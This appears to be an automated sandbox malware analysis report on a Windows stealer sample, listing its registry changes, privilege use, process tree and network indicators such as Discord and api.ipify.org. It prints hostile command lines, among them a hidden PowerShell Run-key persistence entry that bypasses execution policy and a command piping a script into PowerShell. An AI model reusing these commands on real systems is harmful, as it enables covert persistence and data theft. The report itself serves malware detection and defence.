Malware Analysis Report

2025-03-15 00:55

Sample ID 240626-qhpb6syfqk
Target rename_me.exe
SHA256 d2aa93a274505ba40616e3fe4b2753c5f80bac609dd3c3a8410850dd214258f0
Tags
defense_evasion execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

d2aa93a274505ba40616e3fe4b2753c5f80bac609dd3c3a8410850dd214258f0

Threat Level: Likely malicious

The file rename_me.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Hide Artifacts: Hidden Window

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Looks up external IP address via web service

Drops file in System32 directory

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Enumerates physical storage devices

Modifies registry key

Enumerates processes with tasklist

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 13:16

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 13:15

Reported

2024-06-26 14:15

Platform

win10v2004-20240508-en

Max time kernel

1783s

Max time network

1785s

Command Line

"C:\Users\Admin\AppData\Local\Temp\rename_me.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\rename_me.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\tjolRgZfkQWyznu.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Hide Artifacts: Hidden Window

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\cscript.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\cscript.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\cscript.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\cscript.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4640 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 1512 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1512 wrote to memory of 2636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1512 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1512 wrote to memory of 3516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3516 wrote to memory of 1368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3516 wrote to memory of 1368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1368 wrote to memory of 3228 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1368 wrote to memory of 3228 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4640 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4956 wrote to memory of 4048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4956 wrote to memory of 4048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4640 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 2744 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2744 wrote to memory of 2812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4640 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 5096 wrote to memory of 384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 5096 wrote to memory of 384 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2368 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2368 wrote to memory of 4624 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 2532 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2532 wrote to memory of 4032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 3356 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3356 wrote to memory of 1908 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3236 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3236 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4640 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\rename_me.exe C:\Windows\system32\cmd.exe
PID 1516 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1516 wrote to memory of 5056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3612 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2576 wrote to memory of 396 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 396 wrote to memory of 3900 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 396 wrote to memory of 3900 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3924 wrote to memory of 1896 N/A C:\Windows\system32\cscript.EXE C:\Windows\system32\cmd.exe
PID 3924 wrote to memory of 1896 N/A C:\Windows\system32\cscript.EXE C:\Windows\system32\cmd.exe
PID 1896 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 2444 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 4156 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 4156 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1896 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1896 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1896 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1896 wrote to memory of 2592 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1896 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 1896 wrote to memory of 1856 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 860 wrote to memory of 576 N/A C:\Windows\system32\cscript.EXE C:\Windows\system32\cmd.exe
PID 860 wrote to memory of 576 N/A C:\Windows\system32\cscript.EXE C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\rename_me.exe

"C:\Users\Admin\AppData\Local\Temp\rename_me.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

